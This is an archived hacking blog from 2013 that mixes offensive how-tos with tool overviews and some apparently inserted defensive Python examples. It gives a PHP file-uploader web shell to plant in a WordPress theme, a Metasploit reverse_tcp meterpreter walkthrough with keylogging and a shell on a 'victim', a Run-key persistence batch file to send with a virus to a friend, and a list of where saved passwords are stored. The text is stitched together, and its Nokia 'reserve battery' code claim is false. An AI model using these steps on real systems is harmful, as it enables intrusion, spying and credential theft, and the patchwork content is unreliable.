Wednesday, August 28, 2013

Send Facebook Friend Requests even when you got blocked..!!!! :D


Facebook is a great social networking website through which we can stay connected with friends, relatives and other people. But Facebook does not allow you to add strangers as friends. You have probably seen, at least once, a message saying that your friend requests are blocked for 1 day, 3 days, or even 30 days. While you are blocked, you cannot send a friend request to anyone on Facebook, whether you know them or not. This is because Facebook treats friend requests to unknown people as spam and temporarily disables sending friend requests when you violate its rules. This is generally done to protect people’s privacy, since some people misuse the ability to add strangers as friends.
However, sometimes you may even get blocked when you send friend requests to people you know, because a lot of your friend requests are already pending approval. I have also gone through this same stage, and felt helpless that we can’t send friend requests to dear friends. So today I will tell you an easy trick with which you can send friend requests even if you are blocked.

OK, let's start.

1. Open this link - https://www.facebook.com/?sk=ff
2. Then click on "Other tools".
If you don’t know the easiest way to make a contact file, follow these steps.
  • Open a new text document (.txt) in Notepad.
  • Add all the email addresses, separated by commas ( , ).
  • Now save that file with the extension .vcf
  • This is your contact file.
  • Now upload this file to Facebook, and you will be prompted to send friend requests.
 Click “OK” and you’re done.
 Simple yet effective! Your friend requests will be sent to the desired people.
If you are not blocked from sending Friend Requests but still you get warnings like ‘This Friend Request Can’t Be Sent.. :D ;) 

>>$)R!113x<<

Thursday, August 15, 2013

How to Upload your shell on wordpress websites!!

 
Just follow the Steps given below:
 
 

1- Log in to WordPress.
Go to http://www.site.com/wp-admin/

2- Find the "Editor" option under "Appearance" and click on it.

3- Now look at the right sidebar and click on any template, such as 404.php or comments.php.

4- Edit that code and paste this code there:

<?php echo '<b><br><br>'.php_uname().'<br></b>'; echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; if( $_POST['_upl'] == "Upload" ) {  if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>credits : www.devilscafe.in</b><br><br>'; }  else { echo '<b>Upload Sucess !!!</b><br><br>'; } } ?>

You can paste your shell code too..

5- Now click on Update File, and note the theme name.
Now go to http://www.site.com/wp-content/themes/themename/yourshellfile.php

You will now get an upload option there. Select your shell and upload it, and
to view it go to the same directory..

example: http://www.site.com/wp-content/themes/themename/yourshell.php

Now change index.php in public_html for using shell :D
:D



HACKEDOFF!!!
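From the site owner's side, the steps above depend on the dashboard theme editor being enabled, and they leave an upload handler inside a theme template. The following audit is an added example, not code from the original post: it checks wp-config.php for WordPress's DISALLOW_FILE_EDIT / DISALLOW_FILE_MODS constants and flags theme PHP files that combine upload handling, file writes and host fingerprinting. The directory tree, file contents and marker patterns are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Heuristic markers (assumed): a theme template should not accept uploads
# or fingerprint the host it runs on.
MARKERS = {
    "reads uploaded files ($_FILES)": re.compile(r"\$_FILES\b"),
    "writes a file to disk": re.compile(
        r"\b(?:copy|move_uploaded_file|file_put_contents)\s*\("),
    "fingerprints the host (php_uname)": re.compile(r"\bphp_uname\s*\("),
}
EDITOR_LOCK = re.compile(
    r"define\s*\(\s*['\"]DISALLOW_FILE_(?:EDIT|MODS)['\"]\s*,\s*true\s*\)", re.I)


def editor_locked(wp_config_text):
    """True if wp-config.php disables the dashboard theme/plugin editor."""
    for line in wp_config_text.splitlines():
        code = line.strip()
        if code.startswith(("//", "#", "*", "/*")):
            continue  # a commented-out define does not count
        if EDITOR_LOCK.search(code):
            return True
    return False


def scan_theme(theme_dir):
    """Map each PHP file matching two or more markers to the reasons it was flagged."""
    findings = {}
    root = Path(theme_dir)
    for path in sorted(root.rglob("*.php")):
        text = path.read_text(errors="replace")
        reasons = [why for why, rx in MARKERS.items() if rx.search(text)]
        if len(reasons) >= 2:
            findings[path.relative_to(root).as_posix()] = reasons
    return findings


def demo():
    """Build a constructed WordPress tree in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        site = Path(tmp)
        theme = site / "wp-content" / "themes" / "themename"
        theme.mkdir(parents=True)
        # Constructed config: the lock is present but commented out
        (site / "wp-config.php").write_text(
            "<?php\n// define('DISALLOW_FILE_EDIT', true);\n")
        (theme / "index.php").write_text(
            "<?php get_header(); the_content(); get_footer(); ?>")
        # Constructed stand-in for an edited template ($src/$dst are placeholders)
        (theme / "404.php").write_text(
            "<?php echo php_uname(); if ($_FILES) { copy($src, $dst); } ?>")
        locked = editor_locked((site / "wp-config.php").read_text())
        return locked, scan_theme(theme)


if __name__ == "__main__":
    locked, findings = demo()
    print("theme editor locked:", locked)
    for name, reasons in findings.items():
        print(name, "->", "; ".join(reasons))
```

Setting `define('DISALLOW_FILE_EDIT', true);` in wp-config.php removes the editor used in step 2, and comparing theme files against a clean copy of the theme catches edits the pattern match misses.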

Sunday, August 11, 2013

Destroying Windows



 WINDESTROYY..
 

Here, it's a simple code for destroying any WINDOWS.. 

You can simply do it by deleting the NTLDR file from your system.. But it's not so easy to do so.. 

Here's the code to be written in a batch file.. and put it in the startup folder. 
So the next time you switch on Windows, it'll be destroyed.. 


Wednesday, May 1, 2013

All Saved Password Location






Google Chrome:

Chrome passwords are stored in a SQLite file. The site's name and the site's username are in clear text, but the password is protected with a Triple DES algorithm. The file is called Web Data and is stored in the following location:


XP – C:\Documents and Settings\Username\Local Settings\Application Data\Google\Chrome\User Data\Default

Vista – C:\Users\Username\Appdata\Local\Google\Chrome\User Data\Default


Trillian:

Note: I have just realised that in the new version of Trillian the passwords may be stored/encrypted differently.

Trillian passwords are stored in .ini files. The first character of the password is encrypted with XOR with the key 243, then the password is converted into hex. The file name is based on what the password is for, so if it was ICQ it would be icq.ini (for new versions I think they are all stored in a file called accounts.ini or something similar; if you open it up with Notepad you will see all the data plus the encrypted password). The files are stored in the following locations:

XP (old version) – C:\Program Files\Trillian\users\

XP (new version) – C:\Documents and Settings\Username\Local Settings\Application Data\Trillian\user\global – I am not sure on exact but it is somewhere there.

Vista (old version)- C:\Program Files\Trillian\users\

Vista (new version)- C:\Users\Username\Appdata\Roaming\Trillian\user\global



MSN /Windows Live Messenger:

MSN Messenger version 7.x: The passwords are stored under HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Creds\[AccountName]

Windows Live Messenger version 8.x/9.x: The passwords are stored in the Credentials file, with an entry name that begins with “WindowsLive:name=”. It uses a set of Win API functions (Credential APIs) to store its security data (Credentials). These functions store user information, such as names and passwords for the accounts (Windows Live ID credentials). Windows Live ID Credential records are controlled by the operating system for each user and for each session. They are attached to the “target name” and “type”. If you are familiar with SQL you can think of target name and type as the primary key. Table below lists most frequently used fields in Windows Live ID Credential records.



Paltalk:

Paltalk Passwords are using the same password encryption algorithm. Paltalk passwords are stored in the registry. To encrypt the new password Paltalk looks at the serial number of the disk C:\ and performs a mix with the Nickname. The resulting string is then mixed again with the password and some other constants. The final string is then encoded and written to the registry.

AIM, ICQ and Yahoo Messenger passwords that are stored by Paltalk are encoded by BASE64 algorithm.

The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\Paltalk\[Account Name]



Google Talk:

Google Talk passwords are encoded/decoded using Crypto API. Encrypted Gmail passwords are stored by Google Talk in the registry under HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts\[Account Name]



Firefox:

The passwords are stored in one of the following filenames: signons.txt, signons2.txt, and signons3.txt (depends on Firefox version)
These password files are located inside the profile folder of Firefox, in [Windows Profile]\Application Data\Mozilla\Firefox\Profiles\[Profile Name]
Also, key3.db, located in the same folder, is used for encryption/decryption of the passwords.



Yahoo Messenger 6.x:

The password is stored in the Registry, under HKEY_CURRENT_USER\Software\Yahoo\Pager (“EOptions string” value)



Yahoo Messenger 7.5 or later:

The password is stored in the Registry, under HKEY_CURRENT_USER\Software\Yahoo\Pager – “ETS” value.
The value stored in “ETS” value cannot be recovered back to the original password.



AIM:

AIM uses Blowfish and base64 algorithms to encrypt the AIM passwords.
448-bit keyword is used to encrypt the password with Blowfish. The encrypted string is then encoded using base64. The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\America Online\AIM6\Passwords



Filezilla:

Passwords are stored in an .xml file located in the FileZilla folder under AppData; there are sources for this.



Internet Explorer 4.00 – 6.00:

The passwords are stored in a secret location in the Registry known as the “Protected Storage”.
The base key of the Protected Storage is located under the following key:
“HKEY_CURRENT_USER\Software\Microsoft\Protected Storage System Provider”.

You can browse the above key in the Registry Editor (RegEdit), but you won’t be able to watch the passwords, because they are encrypted.
Also, this key cannot easily be moved from one computer to another, like you do with regular Registry keys.



Internet Explorer 7.00 – 8.00:

The new versions of Internet Explorer store the passwords in 2 different locations.
AutoComplete passwords are stored in the Registry under HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2.

HTTP Authentication passwords are stored in the Credentials file under Documents and Settings\Application Data\Microsoft\Credentials , together with login passwords of LAN computers and other passwords.



Opera:

The passwords are stored in the wand.dat file, located under [Windows Profile]\Application Data\Opera\Opera\profile



Outlook Express (All Versions):

The POP3/SMTP/IMAP passwords of Outlook Express are also stored in the Protected Storage, like the passwords of old versions of Internet Explorer.



Outlook 98/2000:

Old versions of Outlook stored the POP3/SMTP/IMAP passwords in the Protected Storage, like the passwords of old versions of Internet Explorer.



Outlook 2002-2008:

All new versions of Outlook store the passwords in the same Registry key of the account settings.

The accounts are stored in the Registry under HKEY_CURRENT_USER\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\[ProfileName]\9375CFF0413111d3B88A00104B2A6676\[Account Index]

If you use Outlook to connect an account on Exchange server, the password is stored in the Credentials file, together with login passwords of LAN computers.



ThunderBird:

The password file is located under [Windows Profile]\Application Data\Thunderbird\Profiles\[Profile Name]
You should search for a filename with the .s extension.



Digsby:

The main password of Digsby is stored in [Windows Profile]\Application Data\Digsby\digsby.dat
All other passwords are stored in Digsby servers.

 

Monday, April 29, 2013

How to find or remove the Virus ?


If you’ve let your guard down–or even if you haven’t–it can be hard to tell if your PC is infected. Here’s what to do if you suspect the worst.
Heard this one before? You must run antivirus software and keep it up to date or else your PC will get infected, you’ll lose all your data, and you’ll incur the wrath of every e-mail buddy you unknowingly infect because of your carelessness.

You know they’re right. Yet for one reason or another, you’re not running antivirus software, or you are but it’s not up to date. Maybe you turned off your virus scanner because it conflicted with another program. Maybe you got tired of upgrading after you bought Norton Antivirus 2001, 2002, and 2003. Or maybe your annual subscription of virus definitions recently expired, and you’ve put off renewing.

It happens. It’s nothing to be ashamed of. But chances are, either you’re infected right now, as we speak, or you will be very soon.
For a few days in late January, the Netsky.p worm was infecting about 2,500 PCs a day. Meanwhile the MySQL bot infected approximately 100 systems a minute (albeit not necessarily desktop PCs). As David Perry, global director of education for security software provider Trend Micro, puts it, “an unprotected [Windows] computer will become owned by a bot within 14 minutes.”

Today’s viruses, worms, and so-called bots–which turn your PC into a zombie that does the hacker’s bidding (such as mass-mailing spam)–aren’t going to announce their presence. Real viruses aren’t like the ones in Hollywood movies that melt down whole networks in seconds and destroy alien spacecraft. They operate in the background, quietly altering data, stealing private operations, or using your PC for their own illegal ends. This makes them hard to spot if you’re not well protected.

Is Your PC “Owned?”
I should start by saying that not every system oddity is due to a virus, worm, or bot. Is your system slowing down? Is your hard drive filling up rapidly? Are programs crashing without warning? These symptoms are more likely caused by Windows, or badly written legitimate programs, rather than malware. After all, people who write malware want to hide their program’s presence. People who write commercial software put icons all over your desktop. Who’s going to work harder to go unnoticed?

Other indicators that may, in fact, indicate that there’s nothing that you need to worry about, include:

* An automated e-mail telling you that you’re sending out infected mail. E-mail viruses and worms typically come from faked addresses.

* A frantic note from a friend saying they’ve been infected, and therefore so have you. This is likely a hoax. It’s especially suspicious if the note tells you the virus can’t be detected but you can get rid of it by deleting one simple file. Don’t be fooled–and don’t delete that file.

I’m not saying that you should ignore such warnings. Copy the subject line or a snippet from the body of the e-mail and plug it into your favorite search engine to see if other people have received the same note. A security site may have already pegged it as a hoax.



Sniffing Out an Infection

There are signs that indicate that your PC is actually infected. A lot of network activity coming from your system (when you’re not actually using the Internet) can be a good indicator that something is amiss. A good software firewall, such as ZoneAlarm, will ask your permission before letting anything leave your PC, and will give you enough information to help you judge if the outgoing data is legitimate. By the way, the firewall that comes with Windows, even the improved version in XP Service Pack 2, lacks this capability.

To put a network status light in your system tray, follow these steps: In Windows XP, choose Start, Control Panel, Network Connections, right-click the network connection you want to monitor, choose Properties, check “Show icon in notification area when connected,” and click OK.

If you’re interested in being a PC detective, you can sniff around further for malware. By hitting Ctrl-Alt-Delete in Windows, you’ll bring up the Task Manager, which will show you the various processes your system is running. Most, if not all, are legit, but if you see a file name that looks suspicious, type it into a search engine and find out what it is.

Want another place to look? In Windows XP, click Start, Run, type “services.msc” in the box, and press Enter. You’ll see detailed descriptions of the services Windows is running. Something look weird? Check with your search engine.

Finally, you can do more detective work by selecting Start, Run, and typing “msconfig” in the box. With this tool you not only see the services running, but also the programs that your system is launching at startup. Again, check for anything weird.

If any of these tools won’t run–or if your security software won’t run–that in itself is a good sign your computer is infected. Some viruses intentionally disable such programs as a way to protect themselves.



What to Do Next
Once you’re fairly sure your system is infected, don’t panic. There are steps you can take to assess the damage, depending on your current level of protection.

* If you don’t have any antivirus software on your system (shame on you), or if the software has stopped working, stay online and go for a free scan at one of several Web sites. There’s McAfee FreeScan, Symantec Security Check, and Trend Micro’s HouseCall. If one doesn’t find anything, try two. In fact, running a free online virus scan is a good way to double-check the work of your own local antivirus program. When you’re done, buy or download a real antivirus program.

* If you have antivirus software, but it isn’t active, get offline, unplug wires– whatever it takes to stop your computer from communicating via the Internet. Then, promptly perform a scan with the installed software.

* If nothing seems to be working, do more research on the Web. There are several online virus libraries where you can find out about known viruses. These sites often provide instructions for removing viruses–if manual removal is possible–or a free removal tool if it isn’t. Check out GriSOFT’s Virus Encyclopedia, Eset’s Virus Descriptions, McAfee’s Virus Glossary, Symantec’s Virus Encyclopedia, or Trend Micro’s Virus Encyclopedia.


A Microgram of Prevention
Assuming your system is now clean, you need to make sure it stays that way. Preventing a breach of your computer’s security is far more effective than cleaning up the mess afterwards. Start with a good security program, such as Trend Micro’s PC-Cillin, which you can buy for $50.

Don’t want to shell out any money? You can cobble together security through free downloads, such as AVG Anti-Virus Free Edition, ZoneAlarm (a personal firewall), and Ad-Aware SE (an antispyware tool).

Just make sure you keep all security software up to date. The bad guys constantly try out new ways to fool security programs. Any security tool without regular, easy (if not automatic) updates isn’t worth your money or your time.

Speaking of updating, the same goes for Windows. Use Windows Update (it’s right there on your Start Menu) to make sure you’re getting all of the high priority updates. If you run Windows XP, make sure to get the Service Pack 2 update. To find out if you already have it, right-click My Computer, and select Properties. Under the General tab, under System, it should say “Service Pack 2.”


Here are a few more pointers for a virus-free life:
* Be careful with e-mail. Set your e-mail software security settings to high. Don’t open messages with generic-sounding subjects that don’t apply specifically to you from people you don’t know. Don’t open an attachment unless you’re expecting it.

* If you have broadband Internet access, such as DSL or cable, get a router, even if you only have one PC. A router adds an extra layer of protection because your PC is not connecting directly with the Internet.

* Check your Internet ports. These doorways between your computer and the Internet can be open, in which case your PC is very vulnerable; closed, but still somewhat vulnerable; or stealthed (or hidden), which is safest. Visit Gibson Research’s Web site and run the free ShieldsUP test to see your ports’ status. If some ports show up as closed–or worse yet, open–check your router’s documentation to find out how to hide them.







Hope you like this post. If you liked it, do share it with your friends.

Sunday, April 28, 2013

CMD in single click :)

Open CMD with right click



If you don’t already have a quick launch icon or a hotkey set to open a command prompt, there’s a really quick trick that you can do on any Windows 7 or Vista computer to open up a command prompt without having to navigate the menu.
Just hold down the Shift key and right-click on the desktop…



And then you can choose “Open Command Window Here” from the menu. The great thing about this is that the current path is the desktop, which is convenient for manipulating files on the desktop.


Of course you can always right-click on any folder icon in the system while holding down the shift key:


Or inside any folder:

Saturday, April 27, 2013

Exploitation

Exploiting Windows 7 Remote Computer Using Metasploit Framework

 Today I’ll tell u how to exploit any remote machine of Windows 7..

The steps are as follows..

First of all, start BackTrack 5 and type “startx” to start the GUI mode:
root@bt:~#startx
The default username and password are:
Username: root
Pass: toor
To find your local IP, open up a konsole (on the bottom left of the taskbar) and type in:
root@bt:~#ifconfig
Launch msfconsole by going to Applications>>Backtrack>>Exploitation Tools>>Network Exploitation Tools>>Metasploit Framework>>msfconsole



 



 



 Let’s now create an executable file which establishes a remote connection between the victim and us, using the meterpreter payload.
Open another shell window

 


root@bt:/opt/framework3/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=anyportno x > /root/reverse_tcp.exe
Your local IP is the one you noted earlier and for port you could select anything.
You will get something like this:


 Also, now on your backtrack desktop, you would be seeing a reverse_tcp.exe file.

 

 



Now open the 1st shell window with msfconsole in it.
msf >
Type the following:
msf > use exploit/multi/handler

 


msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST xxx.xxx.xxx.xxx
LHOST => xxx.xxx.xxx.xxx
msf exploit(handler) > set LPORT 4444
LPORT => 4444
 All the connections are done. You have already made an executable file which makes a reverse connection to you.
And now, you have set the meterpreter to listen to you on port 4444.
The last step you have to do now, is to type in “exploit” and press enter,
msf exploit(handler) > exploit
You would see a meterpreter prompt like this
meterpreter >
Type in ps to list the active processes
meterpreter > ps
Search for explorer.exe and migrate to the process

 meterpreter > migrate 2028
[*] Migrating to 2028…
[*] Migration completed successfully.
meterpreter >
Type in the following:
meterpreter > use priv

 Now, if you want to start the Keylogger activity on victim, just type keyscan_start
Now, if you want to go to the victim’s computer,
Just type shell
meterpreter > shell
Process 844 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>


You would now be having a command prompt,
Type in whoami, to see the computer’s name of victim :
C:\Windows\system32>whoami
whoami
kyrion-pc\kyrion
C:\Windows\system32

Let’s suppose you want to start a notepad on the victim’s computer.
Type in:
Let’s say the victim has typed in anything on his computer.
Just type exit, to return to meterpreter.
Now type in keyscan_dump, to see all the typed keystrokes :
meterpreter > keyscan_dump
Dumping captured keystrokes…

Execute virus on Start up



Hello guys,
You must be familiar with viruses, and you probably know how we can create them. Once a virus gets executed it will show its impact, but only for as long as the system is turned on. If you turn off the system, all the processes of the virus will also get killed.


So our requirement is to run our virus again even if the system gets rebooted. For that we will have to put our virus in startup. But we don’t want to do it manually; instead we would like to do it with the help of a batch file.


So let us assume we have a virus, demo.exe.

Follow these steps for sending it to startup.

1. Open a Notepad file.
2. Write down the following command:
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v demo /t REG_SZ /d demo.exe
3. Now save the Notepad file with any name, say DESTROY, but the extension should be .bat. That means we have to create a batch file, e.g. DESTROY.bat
4. Now send kyrion.bat along with the demo.exe virus to your friend. Whenever he clicks on the kyrion.bat file, demo.exe will automatically be added to startup.
5. Now the impact of the virus will also be visible after the system restarts.

Monday, April 15, 2013

Zenmap

Working Of Zenmap (Network Scanning Tool)

Zenmap is the official graphical user interface (GUI) for the Nmap Security Scanner. It is a multi-platform, free and open-source application designed to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users. Frequently used scans can be saved as profiles to make them easy to run repeatedly. A command creator allows interactive creation of Nmap command lines. Scan results can be saved and viewed later. Saved scans can be compared with one another to see how they differ. The results of recent scans are stored in a searchable database.


CHOSEN SETUP

As Zenmap runs on Windows/Linux, I chose the following setup:
 Windows OS – Windows 7 installed on a system
 Version – Zenmap 6 (http://nmap.org/dist/nmap-6.00-setup.exe)

Scanning
Begin Zenmap by typing zenmap in a terminal or by clicking the Zenmap icon in the desktop environment.
First, select the target. The target can be any domain name or IP address; right now my target is 10.0.0.2.




 
Next is the Profile combo box. Profiles exist for several common scans. After a profile is selected, the Nmap command line associated with it is displayed on the screen. Of course, it is possible to edit these profiles or create new ones.
It is also possible to type in an Nmap command and have it executed without using a profile. Just type in the command and press return or click “Scan”.

 In Zenmap there are 10 Types of Profile :
a.  INTENSE SCAN
Command = nmap -T4 -A 10.0.0.2
Description  = An intense, comprehensive scan. The -A option enables OS detection (-O), version detection (-sV), script scanning (-sC), and traceroute (--traceroute). Without root privileges only version detection and script scanning are run. This is considered an intrusive scan.


SCAN RESULT TABS
Each scan window contains five tabs which each display different aspects of the scan results. They are:
a) Nmap Output
b) Ports / Hosts
c) Topology
d) Host Details

Each of these is discussed in this section:
NMAP OUTPUT
The “Nmap Output” tab is displayed by default when a scan is run. It shows the familiar Nmap terminal output.

PORT/HOSTS
When a service is selected, the “Ports / Hosts” tab shows all the hosts which have that port open or filtered. This is a good way to quickly answer the question “What computers are running HTTP?”



TOPOLOGY

The “Topology” tab is an interactive view of the connections between hosts in a network.


HOST DETAILS
The “Host Details” tab breaks all the information about a single host into a hierarchical display. Shown are the host’s names and addresses, its state (up or down), and the number and status of scanned ports. Also shown are the host’s uptime, operating system and OS icon. When no exact OS match is found, the closest matches are displayed.
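The question the Ports / Hosts tab answers, and the scan comparison mentioned in the introduction, can also be worked from Nmap's XML output (`-oX`). This added example, not part of the original post or of Zenmap itself, indexes open services per host and reports ports that opened or closed between two scans; both XML documents are constructed samples, and only ports in the open state are counted.

```python
import xml.etree.ElementTree as ET

# Constructed samples in the shape of `nmap -oX` output, trimmed to the
# elements this example reads.
BASELINE = """<nmaprun>
  <host><address addr="10.0.0.2" addrtype="ipv4"/><ports>
    <port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
    <port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port>
  </ports></host>
  <host><address addr="10.0.0.3" addrtype="ipv4"/><ports>
    <port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port>
    <port protocol="tcp" portid="3389"><state state="closed"/><service name="ms-wbt-server"/></port>
  </ports></host>
</nmaprun>"""

LATER = """<nmaprun>
  <host><address addr="10.0.0.2" addrtype="ipv4"/><ports>
    <port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
    <port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port>
    <port protocol="tcp" portid="4444"><state state="open"/></port>
  </ports></host>
  <host><address addr="10.0.0.3" addrtype="ipv4"/><ports>
    <port protocol="tcp" portid="80"><state state="closed"/><service name="http"/></port>
    <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
  </ports></host>
</nmaprun>"""


def open_services(xml_text):
    """Return {(address, protocol, port): service_name} for every open port."""
    services = {}
    for host in ET.fromstring(xml_text).iter("host"):
        # A host can also carry a MAC address element; keep the IP one.
        addr = next((a.get("addr") for a in host.iter("address")
                     if a.get("addrtype") in ("ipv4", "ipv6")), None)
        if addr is None:
            continue
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            name = svc.get("name", "unknown") if svc is not None else "unknown"
            services[(addr, port.get("protocol"), int(port.get("portid")))] = name
    return services


def hosts_running(services, service_name):
    """Answer 'what computers are running <service>?' from an index."""
    return sorted({addr for (addr, _, _), name in services.items()
                   if name == service_name})


def diff_scans(old_xml, new_xml):
    """Return (opened, closed): ports open only in the new / only in the old scan."""
    old, new = open_services(old_xml), open_services(new_xml)
    return sorted(new.keys() - old.keys()), sorted(old.keys() - new.keys())


if __name__ == "__main__":
    print("http hosts:", hosts_running(open_services(BASELINE), "http"))
    opened, closed = diff_scans(BASELINE, LATER)
    print("newly open:", opened)
    print("no longer open:", closed)
```

A port that appears in the "newly open" list without a matching change record is the item to investigate first.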



Web Scarab

Web Scarab: Introduction


WebScarab is a framework for analyzing web applications. It is written in Java, which makes it portable to many platforms. WebScarab communicates by using HTTP and HTTPS protocols. WebScarab has several modes of operation, implemented by a number of plugins. In its most common usage, WebScarab operates as an intercepting proxy, allowing the operator to review and modify requests created by the browser before they are sent to the server, and to review and modify responses returned from the server before they are received by the browser. WebScarab is able to intercept both HTTP and HTTPS communication. The operator can also review the conversations (requests and responses) that have passed through WebScarab.


WebScarab is designed to be a tool for anyone who needs to expose the workings of an HTTP(S) based application, whether to allow the developer to debug otherwise difficult problems, or to allow a security specialist to identify vulnerabilities in the way that the application has been designed or implemented.


 

Features:
  • Fragments - Extracts Scripts and HTML comments from HTML pages as they are seen via the proxy, or other plugins.
  • Proxy – Observes traffic between the browser and the web server. The WebScarab proxy is able to observe both HTTP and encrypted HTTPS traffic, by negotiating an SSL connection between WebScarab and the browser instead of simply connecting the browser to the server and allowing an encrypted stream to pass through it. Various proxy plugins have also been developed to allow the operator to control the requests and responses that pass through the proxy.
  • Manual Intercept - Allows the user to modify HTTP and HTTPS requests and responses on the fly, before they reach the server or browser.
  • BeanShell – Allows for the execution of arbitrarily complex operations on requests and responses. Anything that can be expressed in Java can be executed.
  • Reveal Hidden Fields – Sometimes it is easier to modify a hidden field in the page itself, rather than intercepting the request after it has been sent. This plugin simply changes all hidden fields found in HTML pages to text fields, making them visible, and editable.
  • Bandwidth Simulator – Allows the user to emulate a slower network, in order to observe how their website would perform when accessed over, say, a modem.
  • Spider - Identifies new URLs on the target site, and fetches them on command.
  • Manual Request – Allows editing and replay of previous requests, or creation of entirely new requests.
  • SessionID Analysis – Collects and analyzes a number of cookies to visually determine the degree of randomness and unpredictability. Note that this analysis is rather trivial, and does not do any serious checks, such as FIPS, etc.
  • Scripted – Operators can use BeanShell (or any other BSF supported language found on the classpath) to write a script to create requests and fetch them from the server. The script can then perform some analysis on the responses, with all the power of the WebScarab Request and Response object model to simplify things.
  • Parameter Fuzzer – Performs automated substitution of parameter values that are likely to expose incomplete parameter validation, leading to vulnerabilities like Cross Site Scripting (XSS) and SQL Injection.
  • Search – Allows the user to craft arbitrary BeanShell expressions to identify conversations that should be shown in the list.
  • Compare - Calculates the edit distance between the response bodies of the conversations observed, and a selected baseline conversation. The edit distance is “the number of edits required to transform one document into another”. For performance reasons, edits are calculated using word tokens, rather than byte by byte.
  • SOAP – There is a plugin that parses WSDL, and presents the various functions and the required parameters, allowing them to be edited before being sent to the server.
    NOTE: This plugin is deprecated, and may be removed in the future. SOAPUI is streets beyond anything that Webscarab can do, or will ever do, and is also a free tool.
  • Extensions – Automates checks for files that were mistakenly left in web server’s root directory (e.g. .bak, ~, etc). Checks are performed for both, files and directories (e.g. /app/login.jsp will be checked for /app/login.jsp.bak, /app/login.jsp~, /app.zip, /app.tar.gz, etc). Extensions for files and directories can be edited by user.
  • XSS/CRLF – Passive analysis plugin that searches for user-controlled data in HTTP response headers and body to identify potential CRLF injection (HTTP response splitting) and reflected cross-site scripting (XSS) vulnerabilities.

 

Saturday, April 13, 2013

Startup Virus

Execute virus on Start up

Hello guys,
You must be familiar with viruses and probably you must be knowing how we can create them. Once the virus get executed it will show its impact but it will last till the system is turn on, If you will turn off the system all the process of the virus will also get killed.


So our requirement is to run our virus again even if the system get rebooted. So for that we will have to send our virus on start up. But we don’t want to send it manually instead of that we would like to send it with the help of batch file.

So let us take we are having a virus demo.exe.

Follow the following steps for sending it on Start up:


1. Open a Notepad file.

2. Write down the following command.

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v demo /t REG_SZ /d demo.exe

3. Now save the Notepad file with any name, say kyrion, but with the extension .bat. That is, we create a batch file, e.g. kyrion.bat.

4. Now send kyrion.bat along with the demo.exe virus to your friend. Whenever he clicks on kyrion.bat, demo.exe is automatically added to startup.

5. The impact of the virus will now also be visible after the system restarts.
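
Seen from the defending side, the command in step 2 leaves a value under the Run key whose data is a bare file name. As an added example (not part of the original post), this Python code audits `reg query` output for such entries; the sample output, the list of user-writable locations and the extension lists are constructed assumptions.

```python
import ntpath
import re

# Constructed sample of `reg query` output for the Run key named in step 2.
SAMPLE = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    Vendor Updater    REG_SZ    "C:\Program Files\Vendor\updater.exe" /background
    demo    REG_SZ    demo.exe
    sync    REG_SZ    C:\Users\alice\AppData\Local\Temp\sync.bat
"""

USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\downloads\\")
SCRIPT_EXT = (".bat", ".cmd", ".vbs", ".js", ".ps1")
EXE_RE = re.compile(
    r'^"([^"]+)"|^(.+?\.(?:exe|com|scr|bat|cmd|vbs|js|ps1))(?=\s|$)', re.I)

def parse_values(text):
    """Yield (name, type, data) for each value line of reg query output."""
    for line in text.splitlines():
        if line.startswith("    "):
            parts = re.split(r"\s{4}", line.strip(), maxsplit=2)
            if len(parts) == 3:
                yield tuple(parts)

def target(data):
    """Best-effort extraction of the program path from the value data."""
    m = EXE_RE.match(data)
    return (m.group(1) or m.group(2)) if m else data.split()[0]

def audit(text):
    """Map value name -> list of reasons the autorun entry deserves review."""
    findings = {}
    for name, _type, data in parse_values(text):
        exe = target(data)
        reasons = []
        if ntpath.dirname(exe) == "":
            reasons.append("bare filename (no directory)")
        if any(d in exe.lower() for d in USER_WRITABLE):
            reasons.append("user-writable location")
        if exe.lower().endswith(SCRIPT_EXT):
            reasons.append("script file")
        if reasons:
            findings[name] = reasons
    return findings

if __name__ == "__main__":
    for name, reasons in audit(SAMPLE).items():
        print(name, "->", "; ".join(reasons))
```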

 

Hack Nokia

Nokia Mobile Phone HACK Codes


1.  Imagine your cell battery is very low, you are expecting an important call and you don’t have a charger.
     The Nokia instrument comes with a reserve battery. To activate it, key in “*3370#”.
     Your cell will restart with this reserve and your instrument will show a 50% increase in battery.
     This reserve will get charged when you charge your cell next time.

     *3370# Activate Enhanced Full Rate Codec (EFR) – Your phone uses the best sound quality but talk time is reduced by approx 5%
     #3370# Deactivate Enhanced Full Rate Codec (EFR)
     *#4720# Activate Half Rate Codec – Your phone uses a lower quality sound but you should gain approx 30% more Talk Time
